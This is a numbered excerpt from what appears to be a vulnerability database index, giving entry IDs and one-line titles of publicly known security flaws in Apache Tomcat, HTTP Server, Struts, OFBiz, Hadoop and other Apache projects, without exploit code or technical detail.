17862| [87579] Apache Tomcat DIGEST Authentication Stale Nonce Verification Authentication Bypass Weakness
17863| [87477] Apache Tomcat Project Woodstock Service Error Page UTF-7 XSS Weakness
17864| [87227] Apache Tomcat InternalNioInputBuffer.java parseHeaders() Function Request Header Size Parsing Remote DoS
17865| [87223] Apache Tomcat DIGEST Authentication replay-countermeasure Functionality cnonce / cn Verification Authentication Bypass Weakness
17866| [87160] Apache Commons HttpClient X.509 Certificate Domain Name Matching MiTM Weakness
17867| [87159] Apache CXF X.509 Certificate Domain Name Matching MiTM Weakness
17868| [87150] Apache Axis / Axis2 X.509 Certificate Domain Name Matching MiTM Weakness
17869| [86902] Apache HTTP Server 3xx Redirect Internal IP Address Remote Disclosure
17870| [86901] Apache Tomcat Error Message Path Disclosure
17871| [86684] Apache CloudStack Unauthorized Arbitrary API Call Invocation
17872| [86556] Apache Open For Business Project (OFBiz) Unspecified Issue
17873| [86503] Visual Tools VS home/apache/DiskManager/cron/init_diskmgr Local Command Execution
17874| [86401] Apache ActiveMQ ResourceHandler Traversal Arbitrary File Access
17875| [86225] Apache Axis2 XML Signature Wrapping (XSW) Authentication Bypass
17876| [86206] Apache Axis2 Crafted SAML Assertion Signature Exclusion Attack Authentication Bypass
17877| [85722] Apache CXF SOAP Request Parsing Access Restriction Bypass
17878| [85704] Apache Qpid Incoming Client Connection Saturation Remote DoS
17879| [85474] Eucalyptus Apache Santuario (XML Security for Java) Library XML Signature Transform Handling DoS
17880| [85430] Apache mod_pagespeed Module Unspecified XSS
17881| [85429] Apache mod_pagespeed Module Hostname Verification Cross-host Resource Disclosure
17882| [85249] Apache Wicket Unspecified XSS
17883| [85236] Apache Hadoop conf/hadoop-env.sh Temporary File Symlink Arbitrary File Manipulation
17884| [85090] Apache HTTP Server mod_proxy_ajp.c mod_proxy_ajp Module Proxy Functionality Cross-client Information Disclosure
17885| [85089] Apache HTTP Server mod_proxy_http.c mod_proxy_http Module Cross-client Information Disclosure
17886| [85062] Apache Solr Autocomplete Module for Drupal Autocomplete Results XSS
17887| [85010] Apache Struts Token Handling Mechanism Token Name Configuration Parameter CSRF Weakness
17888| [85009] Apache Struts Request Parameter OGNL Expression Parsing Remote DoS
17889| [84911] libapache2-mod-rpaf X-Forward-For HTTP Header Parsing Remote DoS
17890| [84823] Apache HTTP Server Multiple Module Back End Server Error Handling HTTP Request Parsing Remote Information Disclosure
17891| [84818] Apache HTTP Server mod_negotiation Module mod_negotiation.c make_variant_list Function XSS
17892| [84562] Apache Qpid Broker Authentication Mechanism AMQP Client Shadow Connection NullAuthenticator Request Parsing Authentication Bypass
17893| [84458] Apache Libcloud SSL Certificate Validation MitM Spoofing Weakness
17894| [84279] PHP on Apache php_default_post_reader POST Request Handling Overflow DoS
17895| [84278] PHP w/ Apache PDO::ATTR_DEFAULT_FETCH_MODE / PDO::FETCH_CLASS DoS
17896| [84231] Apache Hadoop DataNodes Client BlockTokens Arbitrary Block Access
17897| [83943] Oracle Solaris Cluster Apache Tomcat Agent Subcomponent Unspecified Local Privilege Escalation
17898| [83939] Oracle Solaris Apache HTTP Server Subcomponent Unspecified Remote Information Disclosure
17899| [83685] svnauthcheck Apache HTTP Configuration File Permission Revocation Weakness
17900| [83682] Apache Sling POST Servlet @CopyFrom Operation HTTP Request Parsing Infinite Loop Remote DoS
17901| [83339] Apache Roller Blogger Roll Unspecified XSS
17902| [83270] Apache Roller Unspecified Admin Action CSRF
17903| [82782] Apache CXF WS-SecurityPolicy 1.1 SupportingToken Policy Bypass
17904| [82781] Apache CXF WS-SecurityPolicy Supporting Token Children Specification Token Signing Verification Weakness
17905| [82611] cPanel Apache Piped Log Configuration Log Message Formatting Traversal Arbitrary File Creation
17906| [82436] MapServer for Windows Bundled Apache / PHP Configuration Local File Inclusion
17907| [82215] PHP sapi/cgi/cgi_main.c apache_request_headers Function HTTP Header Handling Remote Overflow
17908| [82161] Apache Commons Compress bzip2 File Compression BZip2CompressorOutputStream Class File Handling Remote DoS
17909| [81965] Apache Batik Squiggle SVG Browser JAR File Arbitrary Code Execution
17910| [81790] Apache POI src/org/apache/poi/hwpf/model/UnhandledDataStructure.java UnhandledDataStructure() constructor Length Attribute CDF / CFBF File Handling Remote DoS
17911| [81660] Apache Qpid Credential Checking Cluster Authentication Bypass
17912| [81511] Apache for Debian /usr/share/doc HTTP Request Parsing Local Script Execution
17913| [81359] Apache HTTP Server LD_LIBRARY_PATH Variable Local Privilege Escalation
17914| [81349] Apache Open For Business Project (OFBiz) Webslinger Component Unspecified XSS
17915| [81348] Apache Open For Business Project (OFBiz) Content IDs / Map-Keys Unspecified XSS
17916| [81347] Apache Open For Business Project (OFBiz) Parameter Arrays Unspecified XSS
17917| [81346] Apache Open For Business Project (OFBiz) checkoutProcess.js getServerError() Function Unspecified XSS
17918| [81196] Apache Open For Business Project (OFBiz) FlexibleStringExpander Nested Script String Parsing Remote Code Execution
17919| [80981] Apache Hadoop Kerberos/MapReduce Security Feature User Impersonation Weakness
17920| [80571] Apache Traffic Server Host HTTP Header Parsing Remote Overflow
17921| [80547] Apache Struts XSLTResult.java File Upload Arbitrary Command Execution
17922| [80360] AskApache Password Protector Plugin for WordPress Error Page $_SERVER Superglobal XSS
17923| [80349] Apache HTTP Server mod_fcgid Module fcgid_spawn_ctl.c FcgidMaxProcessesPerClass Virtual Host Directive HTTP Request Parsing Remote DoS
17924| [80301] Apache Wicket /resources/ Absolute Path Arbitrary File Access
17925| [80300] Apache Wicket wicket:pageMapName Parameter XSS
17926| [79478] Apache Solr Extension for TYPO3 Unspecified XSS
17927| [79002] Apache MyFaces javax.faces.resource In Parameter Traversal Arbitrary File Access
17928| [78994] Apache Struts struts-examples/upload/upload-submit.do name Parameter XSS
17929| [78993] Apache Struts struts-cookbook/processDyna.do message Parameter XSS
17930| [78992] Apache Struts struts-cookbook/processSimple.do message Parameter XSS
17931| [78991] Apache Struts struts2-rest-showcase/orders clientName Parameter XSS
17932| [78990] Apache Struts struts2-showcase/person/editPerson.action Multiple Parameter XSS
17933| [78932] Apache APR Hash Collision Form Parameter Parsing Remote DoS
17934| [78903] Apache CXF SOAP Request Parsing WS-Security UsernameToken Policy Bypass
17935| [78600] Apache Tomcat HTTP DIGEST Authentication DigestAuthenticator.java Catalina Weakness Security Bypass
17936| [78599] Apache Tomcat HTTP DIGEST Authentication Realm Value Parsing Security Bypass
17937| [78598] Apache Tomcat HTTP DIGEST Authentication qop Value Parsing Security Bypass
17938| [78573] Apache Tomcat Parameter Saturation CPU Consumption Remote DoS
17939| [78556] Apache HTTP Server Status Code 400 Default Error Response httpOnly Cookie Disclosure
17940| [78555] Apache HTTP Server Threaded MPM %{cookiename}C Log Format String Cookie Handling Remote DoS
17941| [78501] Apache Struts ParameterInterceptor Class OGNL Expression Parsing Remote Command Execution
17942| [78331] Apache Tomcat Request Object Recycling Information Disclosure
17943| [78293] Apache HTTP Server Scoreboard Invalid Free Operation Local Security Bypass
17944| [78277] Apache Struts ExceptionDelegator Component Parameter Parsing Remote Code Execution
17945| [78276] Apache Struts DebuggingInterceptor Component Developer Mode Unspecified Remote Command Execution
17946| [78113] Apache Tomcat Hash Collision Form Parameter Parsing Remote DoS
17947| [78112] Apache Geronimo Hash Collision Form Parameter Parsing Remote DoS
17948| [78109] Apache Struts ParameterInterceptor Traversal Arbitrary File Overwrite
17949| [78108] Apache Struts CookieInterceptor Cookie Name Handling Remote Command Execution
17950| [77593] Apache Struts Conversion Error OGNL Expression Injection
17951| [77496] Apache ActiveMQ Failover Mechanism Openwire Request Parsing Remote DoS
17952| [77444] Apache HTTP Server mod_proxy Mdule Web Request HTTP/0.9 Protocol URL Parsing Proxy Remote Security Bypass
17953| [77374] Apache MyFaces Java Bean includeViewParameters Parsing EL Expression Security Weakness
17954| [77310] Apache HTTP Server mod_proxy Reverse Proxy Mode Security Bypass Weakness (2011-4317)
17955| [77234] Apache HTTP Server on cygwin Encoded Traversal Arbitrary File Access
17956| [77012] Apache HTTP Server server/utils.c ap_pregsub() Function htaccess File Handling Local Memory Consumption DoS
17957| [76944] Apache Tomcat Manager Application Servlets Access Restriction Bypass
17958| [76744] Apache HTTP Server server/utils.c ap_pregsub() Function htaccess File Handling Local Overflow
17959| [76189] Apache Tomcat HTTP DIGEST Authentication Weakness
17960| [76079] Apache HTTP Server mod_proxy Mdule Web Request URL Parsing Proxy Remote Security Bypass (2011-3368)
17961| [76072] Apache JServ jserv.conf jserv-status Handler jserv/ URI Request Parsing Local Information Disclosure
17962| [75807] Apache HTTP Server Incomplete Header Connection Saturation Remote DoS
17963| [75647] Apache HTTP Server mod_proxy_ajp Module mod_proxy_balancer HTTP Request Remote DoS
17964| [75376] Apache Libcloud SSL Certificate Validation MitM Server Spoofing Weakness
17965| [74853] Domain Technologie Control /etc/apache2/apache2.conf File Permissions Weakness dtcdaemons User Password Disclosure
17966| [74818] Apache Tomcat AJP Message Injection Authentication Bypass
17967| [74725] Apache Wicket Multi Window Support Unspecified XSS
17968| [74721] Apache HTTP Server ByteRange Filter Memory Exhaustion Remote DoS
17969| [74541] Apache Commons Daemon Jsvc Permissions Weakness Arbitrary File Access
17970| [74535] Apache Tomcat XML Parser Cross-application Multiple File Manipulation
17971| [74447] Apache Struts XWork Nonexistent Method s:submit Element Internal Java Class Remote Path Disclosure
17972| [74262] Apache HTTP Server Multi-Processing Module itk.c Configuration Merger mpm-itk root UID / GID Remote Privilege Escalation
17973| [74120] Apache HTTP Server mod_authnz_external mysql/mysql-auth.pl user Field SQL Injection
17974| [73920] Oracle Secure Backup /apache/htdocts/php/common.php username Parameter Remote Code Execution
17975| [73798] Apache Tomcat sendfile Request Start / Endpoint Parsing Local DoS
17976| [73797] Apache Tomcat sendfile Request Attribute Validation Weakness Local Access Restriction Bypass
17977| [73776] Apache Tomcat HTTP BIO Connector HTTP Pipelining Cross-user Remote Response Access
17978| [73644] Apache XML Security Signature Key Parsing Overflow DoS
17979| [73600] Apache Struts javatemplates Plugin Component Handlers .action URI Multiple Parameter XSS
17980| [73462] Apache Rampart/C util/rampart_timestamp_token.c rampart_timestamp_token_validate Function Expired Token Remote Access Restriction Bypass
17981| [73429] Apache Tomcat JMX MemoryUserDatabase Local Password Disclosure
17982| [73384] Apache HTTP Server mod_rewrite PCRE Resource Exhaustion DoS
17983| [73383] Apache HTTP Server Portable Runtime (APR) Library apr_fnmatch() Infinite Loop Remote DoS
17984| [73378] IBM WebSphere Application Server (WAS) JavaServer Pages org.apache.jasper.runtime.JspWriterImpl.response JSP Page Application Restart Remote DoS
17985| [73247] Apache Subversion mod_dav_svn File Permission Weakness Information Disclosure
17986| [73246] Apache Subversion mod_dav_svn Path-based Access Control Rule Handling Remote DoS
17987| [73245] Apache Subversion mod_dav_svn Baselined Resource Request Handling Remote DoS
17988| [73154] Apache Archiva Multiple Unspecified CSRF
17989| [73153] Apache Archiva /archiva/admin/deleteNetworkProxy!confirm.action proxyid Parameter XSS
17990| [72407] Apache Tomcat @ServletSecurity Initial Load Annotation Security Constraint Bypass Information Disclosure
17991| [72238] Apache Struts Action / Method Names <
17992| [71647] Apache HttpComponents HttpClient Proxy-Authorization Credentials Remote Disclosure
17993| [71558] Apache Tomcat SecurityManager ServletContext Attribute Traversal Arbitrary File Manipulation
17994| [71557] Apache Tomcat HTML Manager Multiple XSS
17995| [71075] Apache Archiva User Management Page XSS
17996| [71027] Apache Tomcat @ServletSecurity Annotation Security Constraint Bypass Information Disclosure
17997| [70925] Apache Continuum Project Pages Unspecified XSS (2011-0533)
17998| [70924] Apache Continuum Multiple Admin Function CSRF
17999| [70809] Apache Tomcat NIO HTTP Connector Request Line Processing DoS
18000| [70734] Apache CouchDB Request / Cookie Handling Unspecified XSS
18001| [70585] Oracle Fusion Middleware Oracle HTTP Server Apache Plugin Unspecified Remote Issue
18002| [70333] Apache Subversion rev_hunt.c blame Command Multiple Memory Leak Remote DoS
18003| [70332] Apache Subversion Apache HTTP Server mod_dav_svn repos.c walk FunctionSVNParentPath Collection Remote DoS
18004| [69659] Apache Archiva Admin Authentication Weakness Privilege Escalation
18005| [69520] Apache Archiva Administrator Credential Manipulation CSRF
18006| [69512] Apache Tomcat Set-Cookie Header HTTPOnly Flag Session Hijacking Weakness
18007| [69456] Apache Tomcat Manager manager/html/sessions Multiple Parameter XSS
18008| [69275] Apache mod_fcgid Module fcgid_bucket.c fcgid_header_bucket_read() Function Remote Overflow
18009| [69067] Apache Shiro URI Path Security Traversal Information Disclosure
18010| [68815] Apache MyFaces shared/util/StateUtils.java View State MAC Weakness Cryptographic Padding Remote View State Modification
18011| [68670] Apache Qpid C++ Broker Component broker/SessionAdapter.cpp SessionAdapter::ExchangeHandlerImpl::checkAlternate Function Exchange Alternate Remote DoS
18012| [68669] Apache Qpid cluster/Cluster.cpp Cluster::deliveredEvent Function Invalid AMQP Data Remote DoS
18013| [68662] Apache Axis2 dswsbobje.war Module Admin Account Default Password
18014| [68531] Apache Qpid qpidd sys/ssl/SslSocket.cpp Incomplete SSL Handshake Remote DoS
18015| [68327] Apache APR-util buckets/apr_brigade.c apr_brigade_split_line() Function Memory Consumption DoS
18016| [68314] Apache XML-RPC SAX Parser External Entity Information Disclosure
18017| [67964] Apache Traffic Server Transaction ID / Source Port Randomization Weakness DNS Cache Poisoning
18018| [67846] SUSE Lifecycle Management Server on SUSE Linux Enterprise apache2-slms Parameter Quoting CSRF
18019| [67294] Apache CXF XML SOAP Message Crafted Document Type Declaration Remote DoS
18020| [67240] Apache CouchDB Installation Page Direct Request Arbitrary JavaScript Code Execution CSRF
18021| [67205] Apache Derby BUILTIN Authentication Password Hash Generation Algorithm SHA-1 Transformation Password Substitution
18022| [66745] Apache HTTP Server Multiple Modules Pathless Request Remote DoS
18023| [66319] Apache Tomcat Crafted Transfer-Encoding Header Handling Buffer Recycling Remote DoS
18024| [66280] Apache Struts XWork ParameterInterceptor Server-Side Object Remote Code Execution
18025| [66226] Apache Axis2 Admin Interface Cookie Session Fixation
18026| [65697] Apache Axis2 / Java SOAP Message DTD Rejection Weakness Arbitrary File Access
18027| [65654] Apache HTTP Server mod_proxy_http mod_proxy_http.c Timeout Detection Weakness HTTP Request Response Disclosure
18028| [65429] Apache MyFaces Unencrypted ViewState Serialized View Object Manipulation Arbitrary Expression Language (EL) Statement Execution
18029| [65054] Apache ActiveMQ Jetty Error Handler XSS
18030| [64844] Apache Axis2/Java axis2/axis2-admin/engagingglobally modules Parameter XSS
18031| [64522] Apache Open For Business Project (OFBiz) ecommerce/control/contactus Multiple Parameter XSS
18032| [64521] Apache Open For Business Project (OFBiz) Web Tools Section entityName Parameter XSS
18033| [64520] Apache Open For Business Project (OFBiz) ecommerce/control/ViewBlogArticle contentId Parameter XSS
18034| [64519] Apache Open For Business Project (OFBiz) Control Servlet URI XSS
18035| [64518] Apache Open For Business Project (OFBiz) Show Portal Page Section start Parameter XSS
18036| [64517] Apache Open For Business Project (OFBiz) View Profile Section partyId Parameter XSS
18037| [64516] Apache Open For Business Project (OFBiz) Export Product Listing Section productStoreId Parameter XSS
18038| [64307] Apache Tomcat Web Application Manager/Host Manager CSRF
18039| [64056] mod_auth_shadow for Apache HTTP Server wait() Function Authentication Bypass
18040| [64023] Apache Tomcat WWW-Authenticate Header Local Host Information Disclosure
18041| [64020] Apache ActiveMQ Jetty ResourceHandler Crafted Request JSP File Source Disclosure
18042| [63895] Apache HTTP Server mod_headers Unspecified Issue
18043| [63368] Apache ActiveMQ createDestination.action JMSDestination Parameter CSRF
18044| [63367] Apache ActiveMQ createDestination.action JMSDestination Parameter XSS
18045| [63350] Apache CouchDB Hash Verification Algorithm Predictable Execution Time Weakness
18046| [63140] Apache Thrift Service Malformed Data Remote DoS
18047| [62676] Apache HTTP Server mod_proxy_ajp Module Crafted Request Remote DoS
18048| [62675] Apache HTTP Server Multi-Processing Module (MPM) Subrequest Header Handling Cross-thread Information Disclosure
18049| [62674] Apache HTTP Server mod_isapi Module Unloading Crafted Request Remote DoS
18050| [62231] Apache HTTP Server Logging Format Weakness Crafted DNS Response IP Address Spoofing
18051| [62230] Apache HTTP Server Crafted DNS Response Inverse Lookup Log Corruption XSS
18052| [62054] Apache Tomcat WAR Filename Traversal Work-directory File Deletion
18053| [62053] Apache Tomcat Autodeployment Process appBase File HTTP Request Authentication Bypass
18054| [62052] Apache Tomcat WAR File Traversal Arbitrary File Overwrite
18055| [62009] Apache HTTP Server src/modules/proxy/proxy_util.c mod_proxy ap_proxy_send_fb() Function Overflow
18056| [61379] Apache River Outrigger Entry Storage Saturation Memory Exhaustion DoS
18057| [61378] Apache Hadoop Map/Reduce JobTracker Memory Consumption DoS
18058| [61377] Apache Commons Modeler Multiple Mutable Static Fields Weakness
18059| [61376] Apache Rampart wsse:security Tag Signature Value Checking Weakness
18060| [60687] Apache C++ Standard Library (STDCXX) strxfrm() Function Overflow
18061| [60680] Apache Hadoop JobHistory Job Name Manipulation Weakness
18062| [60679] Apache ODE DeploymentWebService OMElement zipPart CRLF Injection
18063| [60678] Apache Roller Comment Email Notification Manipulation DoS
18064| [60677] Apache CouchDB Unspecified Document Handling Remote DoS
18065| [60428] Sun Java Plug-in org.apache.crimson.tree.XmlDocument Class reateXmlDocument Method Floppy Drive Access Bypass
18066| [60413] mod_throttle for Apache Shared Memory File Manipulation Local Privilege Escalation
18067| [60412] Sun Java Plug-in org.apache.xalan.processor.XSLProcessorVersion Class Unsigned Applet Variable Sharing Privilege Escalation
18068| [60396] Apache HTTP Server on OpenBSD Multipart MIME Boundary Remote Information Disclosure
18069| [60395] Apache HTTP Server on OpenBSD ETag HTTP Header Remote Information Disclosure
18070| [60232] PHP on Apache php.exe Direct Request Remote DoS
18071| [60176] Apache Tomcat Windows Installer Admin Default Password
18072| [60016] Apache HTTP Server on HP Secure OS for Linux HTTP Request Handling Unspecified Issue
18073| [59979] Apache HTTP Server on Apple Mac OS X HTTP TRACE Method Unspecified Client XSS
18074| [59969] Apache HTTP Server mod_ssl SSL / TLS Renegotiation Handshakes MiTM Plaintext Data Injection
18075| [59944] Apache Hadoop jobhistory.jsp XSS
18076| [59374] Apache Solr Search Extension for TYPO3 Unspecified XSS
18077| [59022] Apache Shindig ConcatProxyServlet HTTP Header Response Splitting
18078| [59021] Apache Cocoon X-Cocoon-Version Header Remote Information Disclosure
18079| [59020] Apache Tapestry HTTPS Session Cookie Secure Flag Weakness
18080| [59019] Apache mod_python Cookie Salting Weakness
18081| [59018] Apache Harmony Error Message Handling Overflow
18082| [59013] Apache Derby SYSCS_EXPORT_TABLE Arbitrary File Overwrite
18083| [59012] Apache Derby Driver Auto-loading Non-deterministic Startup Weakness
18084| [59011] Apache JSPWiki Page Attachment Change Note Function XSS
18085| [59010] Apache Solr get-file.jsp XSS
18086| [59009] Apache Solr action.jsp XSS
18087| [59008] Apache Solr analysis.jsp XSS
18088| [59007] Apache Solr schema.jsp Multiple Parameter XSS
18089| [59006] Apache Beehive select / checkbox Tag XSS
18090| [59005] Apache Beehive jpfScopeID Global Parameter XSS
18091| [59004] Apache Beehive Error Message XSS
18092| [59003] Apache HttpClient POST Request Handling Memory Consumption DoS
18093| [59002] Apache Jetspeed default-page.psml URI XSS
18094| [59001] Apache Axis2 xsd Parameter Traversal Arbitrary File Disclosure
18095| [59000] Apache CXF Unsigned Message Policy Bypass
18096| [58999] Apache WSS4J CallbackHandler Plaintext Password Validation Weakness
18097| [58998] Apache OpenJPA persistence.xml Cleartext Password Local Disclosure
18098| [58997] Apache OpenEJB openejb.xml Cleartext Password Local Disclosure
18099| [58996] Apache Hadoop Map/Reduce LinuxTaskController File Group Ownership Weakness
18100| [58995] Apache Hadoop Map/Reduce Task Ownership Weakness
18101| [58994] Apache Hadoop Map/Reduce DistributedCache Localized File Permission Weakness
18102| [58993] Apache Hadoop browseBlock.jsp XSS
18103| [58991] Apache Hadoop browseDirectory.jsp XSS
18104| [58990] Apache Hadoop Map/Reduce HTTP TaskTrackers User Data Remote Disclosure
18105| [58989] Apache Hadoop Sqoop Process Listing Local Cleartext Password Disclosure
18106| [58988] Apache Hadoop Chukwa HICC Portal Unspecified XSS
18107| [58987] Apache Hadoop Map/Reduce TaskTracker User File Permission Weakness
18108| [58986] Apache Qpid Encrypted Message Handling Remote Overflow DoS
18109| [58985] Apache Qpid Process Listing Local Cleartext Password Disclosure
18110| [58984] Apache Jackrabbit Content Repository (JCR) Default Account Privilege Access Weakness
18111| [58983] Apache Jackrabbit Content Repository (JCR) NamespaceRegistry API Registration Method Race Condition
18112| [58982] Apache Synapse Proxy Service Security Policy Mismatch Weakness
18113| [58981] Apache Geronimo TomcatGeronimoRealm Security Context Persistence Weakness
18114| [58980] Apache Geronimo LDAP Realm Configuration Restart Reversion Weakness
18115| [58979] Apache MyFaces Tomahawk ExtensionsPhaseListener HTML Injection Information Disclosure
18116| [58978] Apache MyFaces Trinidad LocaleInfoScriptlet XSS
18117| [58977] Apache Open For Business Project (OFBiz) Multiple Default Accounts
18118| [58976] Apache Open For Business Project (OFBiz) URI passThru Parameter XSS
18119| [58975] Apache Open For Business Project (OFBiz) PARTYMGR_CREATE/UPDATE Permission Arbitrary User Password Modification
18120| [58974] Apache Sling /apps Script User Session Management Access Weakness
18121| [58973] Apache Tuscany Crafted SOAP Request Access Restriction Bypass
18122| [58931] Apache Geronimo Cookie Parameters Validation Weakness
18123| [58930] Apache Xalan-C++ XPath Handling Remote DoS
18124| [58879] Apache Portable Runtime (APR-util) poll/unix/port.c Event Port Backend Pollset Feature Remote DoS
18125| [58837] Apache Commons Net FTPSClient CipherSuites / Protocols Mutable Object Unspecified Data Security Issue
18126| [58813] Apache MyFaces Trinidad tr:table / HTML Comment Handling DoS
18127| [58812] Apache Open For Business Project (OFBiz) JSESSIONID Session Hijacking Weakness
18128| [58811] Apache Open For Business Project (OFBiz) /catalog/control/EditProductConfigItem configItemId Parameter XSS
18129| [58810] Apache Open For Business Project (OFBiz) /catalog/control/EditProdCatalo prodCatalogId Parameter XSS
18130| [58809] Apache Open For Business Project (OFBiz) /partymgr/control/viewprofile partyId Parameter XSS
18131| [58808] Apache Open For Business Project (OFBiz) /catalog/control/createProduct internalName Parameter XSS
18132| [58807] Apache Open For Business Project (OFBiz) Multiple Unspecified CSRF
18133| [58806] Apache FtpServer MINA Logging Filter Cleartext Credential Local Disclosure
18134| [58805] Apache Derby Unauthenticated Database / Admin Access
18135| [58804] Apache Wicket Header Contribution Unspecified Issue
18136| [58803] Apache Wicket Session Fixation
18137| [58802] Apache Directory Server (ApacheDS) userPassword Attribute Search Password Disclosure
18138| [58801] Apache ActiveMQ Stomp Client Credential Validation Bypass
18139| [58800] Apache Tapestry (context)/servicestatus Internal Service Information Disclosure
18140| [58799] Apache Tapestry Logging Cleartext Password Disclosure
18141| [58798] Apache Jetspeed pipeline Parameter pipeline-map Policy Bypass
18142| [58797] Apache Jetspeed Password Policy Multiple Weaknesses
18143| [58796] Apache Jetspeed Unsalted Password Storage Weakness
18144| [58795] Apache Rampart Crafted SOAP Header Authentication Bypass
18145| [58794] Apache Roller Admin Protocol (RAP) Malformed Header Authentication Bypass
18146| [58793] Apache Hadoop Map/Reduce mapred.system.dir Permission Weakness Job Manipulation
18147| [58792] Apache Shindig gadgets.rpc iframe RPC Call Validation Weakness
18148| [58791] Apache Synapse synapse.properties Cleartext Credential Local Disclosure
18149| [58790] Apache WSS4J SOAP Message UsernameToken Remote Password Disclosure
18150| [58789] Apache WSS4J SOAP Header Malformed UsernameToken Authentication Bypass
18151| [58776] Apache JSPWiki PreviewContent.jsp Edited Text XSS
18152| [58775] Apache JSPWiki preview.jsp action Parameter XSS
18153| [58774] Apache JSPWiki Edit.jsp Multiple Parameter XSS
18154| [58773] Apache JSPWiki Accept-Language Header Multiple Script language Parameter XSS
18155| [58772] Apache JSPWiki EditorManager.java editor Parameter XSS
18156| [58771] Apache JSPWiki GroupContent.jsp Multiple Parameter XSS
18157| [58770] Apache JSPWiki Group.jsp group Parameter XSS
18158| [58769] Apache JSPWiki Database Connection Termination DoS Weakness
18159| [58768] Apache JSPWiki Attachment Servlet nextpage Parameter Arbitrary Site Redirect
18160| [58766] Apache JSPWiki /admin/SecurityConfig.jsp Direct Request Information Disclosure
18161| [58765] Apache JSPWiki Spam Filter UniqueID RNG Weakness
18162| [58764] Apache JSPWiki Edit.jsp Multiple Parameter XSS
18163| [58763] Apache JSPWiki Include Tag Multiple Script XSS
18164| [58762] Apache JSPWiki Multiple .java Tags pageContext Parameter XSS
18165| [58761] Apache JSPWiki Wiki.jsp skin Parameter XSS
18166| [58760] Apache Commons VFS Exception Error Message Cleartext Credential Disclosure
18167| [58759] Apache Jackrabbit Content Repository (JCR) UUID System.currentTimeMillis() RNG Weakness
18168| [58758] Apache River GrantPermission Policy Manipulation Privilege Escalation
18169| [58757] Apache WS-Commons Java2 StaXUtils Multiple Unspecified Minor Issues
18170| [58756] Apache WSS4J WSHandler Client Certificate Signature Validation Weakness
18171| [58755] Apache Harmony DRLVM Non-public Class Member Access
18172| [58754] Apache Harmony File.createTempFile() Temporary File Creation Prediction Weakness
18173| [58751] Apache Geronimo GeronimoIdentityResolver Subject Handling Multiple Issues
18174| [58750] Apache MyFaces Trinidad Generated HTML Information Disclosure
18175| [58749] Apache MyFaces Trinidad Database Access Error Message Information Disclosure
18176| [58748] Apache MyFaces Trinidad Image Resource Loader Traversal Arbitrary Image Access
18177| [58747] Apache MyFaces Trinidad Error Message User Entered Data Disclosure Weakness
18178| [58746] Apache Axis2 JAX-WS Java2 WSDL4J Unspecified Issue
18179| [58744] Apache Wicket Crafted File Upload Disk Space Exhaustion DoS
18180| [58743] Apache Wicket wicket.util.crypt.SunJceCrypt Encryption Reversion Weakness
18181| [58742] Apache Rampart PolicyBasedValiadtor HttpsToken Endpoint Connection Weakness
18182| [58741] Apache Rampart WSSecSignature / WSSecEncryptedKey KeyIdentifierType Validation Weakness
18183| [58740] Apache Rampart TransportBinding Message Payload Cleartext Disclosure
18184| [58739] Apache Open For Business Project (OFBiz) Unsalted Password Storage Weakness
18185| [58738] Apache Open For Business Project (OFBiz) orderId Parameter Arbitrary Order Access
18186| [58737] Apache mod_python w/ mod_python.publisher index.py Underscore Prefixed Variable Disclosure
18187| [58735] Apache Open For Business Project (OFBiz) /ecommerce/control/keywordsearch SEARCH_STRING Parameter XSS
18188| [58734] Apache Torque Log File Cleartext Credential Local Disclosure
18189| [58733] Apache Axis2 doGet Implementation Authentication Bypass Service State Manipulation
18190| [58732] Apache MyFaces UIInput.validate() Null Value Validation Bypass Weakness
18191| [58731] Apache MyFaces /faces/* Prefix Mapping Authentication Bypass
18192| [58725] Apache Tapestry Basic String ACL Bypass Weakness
18193| [58724] Apache Roller Logout Functionality Failure Session Persistence
18194| [58723] Apache Roller User Profile / Admin Page Cleartext Password Disclosure
18195| [58722] Apache Derby Connection URL Encryption Method Reversion Weakness
18196| [58721] Apache Geronimo on Tomcat Security-constraint Resource ACL Bypass
18197| [58720] Apache Geronimo Explicit Servlet Mapping Access Bypass Weakness
18198| [58719] Apache Geronimo Keystore Unprivileged Service Disable DoS
18199| [58718] Apache Geronimo Deployment Plans Remote Password Disclosure
18200| [58717] Apache Jetspeed Portlet Application Edit Access Restriction Bypass
18201| [58716] Apache Jetspeed PSML Management Cached Constraint Authentication Weakness
18202| [58707] Apache WSS4J Crafted PasswordDigest Request Authentication Bypass
18203| [58706] Apache HttpClient Pre-emptive Authorization Remote Credential Disclosure
18204| [58705] Apache Directory Server (ApacheDS) User Passwords Cleartext Disclosure
18205| [58704] Apache Directory Server (ApacheDS) Non-existent User LDAP Bind Remote DoS
18206| [58703] Apache Geronimo Debug Console Unauthenticated Remote Information Disclosure
18207| [58702] Apache Directory Server (ApacheDS) Persistent LDAP Anonymous Bind Weakness
18208| [58701] Apache Jetspeed User Admin Portlet Unpassworded Account Creation Weakness
18209| [58700] Apache MyFaces /faces/* Path Handling Remote Overflow DoS
18210| [58699] Apache MyFaces Disable Property Client Side Manipulation Privilege Escalation
18211| [58698] Apache Roller Remember Me Functionality Cleartext Password Disclosure
18212| [58697] Apache XalanJ2 org.apache.xalan.xsltc.runtime.CallFunction Class Unspecified Issue
18213| [58696] Apache Tapestry Encoded Traversal Arbitrary File Access
18214| [58695] Apache Jetspeed Unauthenticated PSML Tags / Admin Folder Access
18215| [58694] Apache Geronimo Deploy Tool Process List Local Credential Disclosure
18216| [58693] Apache Derby service.properties File Encryption Key Information Disclosure
18217| [58692] Apache Geronimo Default Security Realm Login Brute Force Weakness
18218| [58689] Apache Roller Retrieve Last 5 Post Feature Unauthorized Blog Post Manipulation
18219| [58688] Apache Xalan-Java (XalanJ2) Static Variables Multiple Unspecified Issues
18220| [58687] Apache Axis Invalid wsdl Request XSS
18221| [58686] Apache Cocoon Temporary File Creation Unspecified Race Condition
18222| [58685] Apache Velocity Template Designer Privileged Code Execution
18223| [58684] Apache Jetspeed controls.Customize Action Security Check Bypass
18224| [58675] Apache Open For Business Project (OFBiz) eCommerce/ordermgr Multiple Field XSS
18225| [58674] Apache Open For Business Project (OFBiz) ecommerce/control/login Multiple Field XSS
18226| [58673] Apache Open For Business Project (OFBiz) ecommerce/control/viewprofile Multiple Field XSS
18227| [58672] Apache Open For Business Project (OFBiz) POS Input Panel Cleartext Password Disclosure
18228| [58671] Apache Axis2 JMS Signed Message Crafted WS-Security Header Security Bypass
18229| [58670] Apache Jetspeed JetspeedTool.getPortletFromRegistry Portlet Security Validation Failure
18230| [58669] Apache Jetspeed LDAP Cleartext Passwords Disclosure
18231| [58668] Apache Axis External Entity (XXE) Data Parsing Privilege Escalation
18232| [58667] Apache Roller Database Cleartext Passwords Disclosure
